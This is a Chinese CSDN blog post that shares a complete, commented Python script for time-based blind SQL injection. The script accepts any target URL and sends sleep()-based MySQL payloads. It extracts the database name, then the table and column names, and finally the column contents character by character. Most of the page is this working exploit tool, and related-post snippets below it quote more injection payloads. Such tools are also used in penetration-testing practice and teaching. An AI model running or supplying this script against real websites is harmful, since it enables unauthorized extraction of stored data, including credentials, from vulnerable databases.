时间盲注脚本(附带注释)

最新推荐文章于 2024-08-07 21:53:08 发布
最新推荐文章于 2024-08-07 21:53:08 发布
阅读量2.8k 收藏 15
点赞数 3
分类专栏: 渗透测试 SQL注入 Python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/123674751
版权

python 网络 后端 sql注入
渗透测试 同时被 3 个专栏收录
82 篇文章 18 订阅
订阅专栏
Python
24 篇文章 2 订阅
订阅专栏
SQL注入
13 篇文章 0 订阅
订阅专栏

参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑

# -*- coding: UTF-8 -*-

import requests
import time

DBName = ""  # 数据库名的变量
DBTables = []
DBColumns = []
DBData = {}

requests.adapters.DEFAULT_RETRIES = 10
conn = requests.session()
conn.keep_alive = False  # 设置重连次数(自行调整),连接活跃状态为False


# 盲注主函数
def StartSqli(url):
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url, DBName, DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if (columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])


# 数据库名
def GetDBName(url):
    # 引用全局变量用来存放当前使用的数据名
    global DBName
    print('[-]开始获取数据库名的长度')
    DBNameLen = 0
    payload = '1 and if(length(database())={0},sleep(3),0) %23'
    targetUrl = url + payload
    # 用遍历得出数据库的长度
    for DBNameLen in range(1, 99):
        # 开始时间
        timestart = time.time()
        # 访问
        res = requests.get(targetUrl.format(DBNameLen))
        timeend = time.time()
        if timeend - timestart >= 3:
            print('[+]数据库的长度:' + str(DBNameLen))
            break
    print('[-]开始获取数据库名')
    payload = '1 and if(ascii(substr(database(),{0},1))={1},sleep(3),0) %23'
    targetUrl = url + payload
    for a in range(1, DBNameLen + 1):
        for b in range(33, 127):
            # 开始时间
            timestart = time.time()
            # 访问
            res = requests.get(targetUrl.format(a, b))
            timeend = time.time()
            if timeend - timestart >= 3:
                DBName += chr(b)
                print('[-]' + DBName)
                break


# 表名
def GetDBTables(url, dbname):
    global DBTables
    # 初始数据库表的数量为0
    print('[-]开始获取{0}数据库表的数量:'.format(dbname))
    payload = "1 and if((select count(table_name) from information_schema.tables where table_schema='{0}')={1},sleep(3),0) %23"
    targetUrl = url + payload
    # 开始遍历获取数据库表的数量
    for DBTableCount in range(1, 99):
        timeStart = time.time()
        res = requests.get(targetUrl.format(dbname, DBTableCount))
        timeEnd = time.time()
        if timeEnd - timeStart >= 3:
            print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))
            break
    print('[-]开始获取{0}数据库的表'.format(dbname))
    # 遍历完表数量后,开始遍历表的长度
    tableLen = 0
    # 根据表的数量猜解表的长度
    for a in range(0, DBTableCount):
        print('[-]正在获取第{0}个表名'.format(a + 1))
        for tableLen in range(1, 99):
            payload = "1 and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(3),0) %23"
            targetUrl = url + payload
            timeStart = time.time()
            res = requests.get(targetUrl.format(dbname, a, tableLen))
            timeEnd = time.time()
            if timeEnd - timeStart >= 3:
                break
        # 通过表名长度获取表名
        table = ''
        for b in range(1, tableLen + 1):  # sqli   |  第一个表|第一个表第一个字符串|第一个表第一个字符串的ascii码
            payload = "1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(3),0)%23"
            targetUrl = url + payload
            # c表示从33~127w位ascii码
            for c in range(33, 128):
                timeStart = time.time()
                res = conn.get(targetUrl.format(dbname, a, b, c))
                timeEnd = time.time()
                if timeEnd - timeStart >= 3:
                    table += chr(c)
                    print(table)
                    break
        # 将获取到的表追加至DBTables这个表中
        DBTables.append(table)
        table = ''  # 清空


# 字段:字段个数-->字段长度-->字段名
def GetDBColumns(url, dbname, dbtable):
    try:
        global DBColumns
        DBColumnCount = 0
        print('[-]开始获取{0}数据表的字段数:'.format(dbtable))
        for DBColumnCount in range(1, 99):
            #                                                                                               数据库             数据库第一个表名|字段数量
            payload = "1 and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(3),0) %23"
            targetUrl = url + payload
            timeStart = time.time()
            res = requests.get(targetUrl.format(dbname, dbtable, DBColumnCount))
            timeEnd = time.time()
            if timeEnd - timeStart >= 3:
                print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))
                break
        # 获取字段的长度后获取字段名
        column = ''
        for a in range(0, DBColumnCount):
            print('[-]正在获取第{0}个字段名'.format(a + 1))
            # 先获取字段的长度
            for columnLen in range(99):
                #                                                                                                 数据库               表名         第一个字段|第一个字段长度
                payload = "1 and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(3),0) %23"
                targetUrl = url + payload
                timeStart = time.time()
                res = requests.get(targetUrl.format(dbname, dbtable, a, columnLen))
                timeEnd = time.time()
                if timeEnd - timeStart >= 3:
                    break
                    # b表示当前字段名猜解的位置
            for b in range(1, columnLen + 1):
                payload = "1 and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(3),0) %23"
                targetUrl = url + payload
                # c表示33~127位ASCII中可显示字符
                for c in range(33, 128):
                    timeStart = time.time()
                    res = conn.get(targetUrl.format(dbname, dbtable, a, b, c))
                    timeEnd = time.time()
                    if timeEnd - timeStart >= 3:
                        column += chr(c)
                        print(column)
                        break
            # 把获取到的名加入到DBColumns
            DBColumns.append(column)
            # 清空column,用来继续获取下一个字段名
            column = ""
    except requests.exceptions.ConnectionError as ganyu:
        GetDBColumns(url, dbname, dbtable)


# 字段数据
def GetDBData(url, dbtable, dbcolumn):
    try:
        global DBData
        # 获取字段的数量
        DBDataCount = 0
        print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))
        for DBDataCount in range(0, 99):
            payload = "1 and if((select count({0}) from {1})={2},sleep(3),0) %23"
            targetUrl = url + payload
            timeStart = time.time()
            res = requests.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))
            timeEed = time.time()
            if timeEed - timeStart >= 3:
                print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))
                break
        for a in range(0, DBDataCount):
            print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))
            # 获取这个数据的长度
            dataLen = 0
            for dataLen in range(99):
                payload = "1 and  if((select length({0}) from {1} limit {2},1)={3},sleep(3),0) %23"
                targetUrl = url + payload
                timeStart = time.time()
                res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))
                timeEnd = time.time()
                if timeEnd - timeStart >= 3:
                    print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))
                    break
            data = ''
            # 获取数据的具体内容
            for b in range(1, dataLen + 1):
                for c in range(33, 128):
                    payload = "1 and  if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(3),0) %23"
                    targetUrl = url + payload
                    timeStart = time.time()
                    res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))
                    timeEnd = time.time()
                    if timeEnd - timeStart >= 3:
                        data += chr(c)
                        print(data)
                        break
            # 放到以字段名为键,值为列表的字典中存放
            DBData.setdefault(dbcolumn, []).append(data)
            print(DBData)
            # 把data清空来,继续获取下一个数据
            data = ""
    except requests.exceptions.ConnectionError as ganyu:
        GetDBData(url, dbtable, dbcolumn)


ganyu = input('输入需要进行盲注的地方:')
StartSqli(ganyu)
​

bbb07
关注
专栏目录
【漏洞挖掘】——121、Xpath注入深入刨析
Fly_鹏程万里
06-28 168
XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
时间盲注python脚本(二分查找优化)支持cookie注入
qq_36915061的博客
12-02 948
时间盲注python脚本(二分查找优化)支持cookie注入 菜鸟自用,仅供参考 使用说明 可根据用途更改payload中的select语句,字符型注入点有两种注入情况: 1、最后添加注释符 2、最后的字符添加单引号,与原语句中的单引号闭合 get_length和get_name可结合使用 可根据自己的猜解范围调整min和max import requests import dat...
时间盲注脚本
weixin_55347427的博客
08-02 341
fafaffafa
SQL注入---时间盲注
最新发布
ningwangh的博客
08-07 1097
时间盲注使用的优先级并不高,通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑,希望这篇文章能带给你帮助。
Python脚本-时间盲注
m0_74317362的博客
09-23 1124
添加了time.sleep(0.05)
用py写一个时间盲注脚本(初学向)
qq_62540010的博客
02-06 3477
用py写一个时间盲注脚本 1. 首先我们要清楚时间盲注的特点是利用了sql中sleep这个函数,借助的是响应时间不同来判断构造语句的对错,那么我们主要思路就要通过记录响应时间来执行一系列操作,下面是我写的一个简单脚本 2. import requests import time for i in range(1,20): url="http://127.0.0.1/sqli/Less-9/?id=1'and if(length(database())={i},1,sleep(5))--+"
SQL-LABS GET型基于时间盲注脚本(node)
AaronLuo
09-05 695
原理 MYSQL 基于时间盲注详解 主要是通过将每个字符进行8次按位与运算,结果相加得到相应的ascii码值,进而得到对应的字符,通过此特性,构造Get请求,循环url,得到ascii码值,一个ascii码值需要执行8次按位与,只需要判断从发送请求到返回数据的耗时大于等于sleep函数的参数,则记录按位与得到的值,最后相加并转换得到一个字符,当转换的ascii码 = 0的时候,表示没有字符了,即可...
SQLMAP 1.0 源码分析
Test网络安全
08-28 2540
环境 git下载好源码后,可以方便查看记录 git tag 查看版本 然后用 git checkout 1.0 切换到1.0的版本 编辑器使用的是vscode + python插件 初步 最直观的感受,相比最初的版本,sqlmap以及有了大致的雏形。目录也丰富了许多 也加入了sqlmapapi,文件的数量和内容相比之前有了明显的增加,到底增加了什么呢,带着这个疑问,继续看源码。 注入流程 还是从sqlmap最精华的注入流程看起。启动流程和最初版本差不多,先检测各种变量..
CBK-D5-安全测试与开发.md
sdyu_peter的博客
08-06 1109
CBK-D5-安全测试与开发.md 安全评估与测试osg15 软件开发安全osg20、21
CTF之web安全基础
weixin_45574957的博客
03-15 1516
CTF WEB安全
时间盲注python脚本.zip
12-28
python编写时间盲注自动化的脚本
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sql注入时间盲注脚本,mysql结构)
2401_82760239的博客
04-04 621
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 568
时间盲注脚本
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2604
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1664
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1401
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
sql-labs Time-based盲注脚本
lixiangminghate的专栏
07-14 1020
    sqli-labs lab9/lab10是基于时间盲注,如果完全用手动注入,费时费力。想到之前写过一篇基于布尔盲注的博文,于是我把当时脚本中的payload进行了修改,记录于此。    相比之前的脚本,替换了payload。另外,脚本记录了发送请求前的时间和响应返回的时间,比较时间差是否大于payload中设置的sleep时间(因为测试用的服务器就在本地虚拟机里,几乎不会有延迟,所以可以...
sqli-labs通用盲注脚本
06-14
通用盲注的常见脚本通常包含以下几个步骤: 1. **构造查询**:发起一个基础的SQL查询,然后向其添加一个变量或条件,比如 `SELECT * FROM users WHERE id = ?`,其中`?` 是变量。 2. **发送请求**:使用GET或POST...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值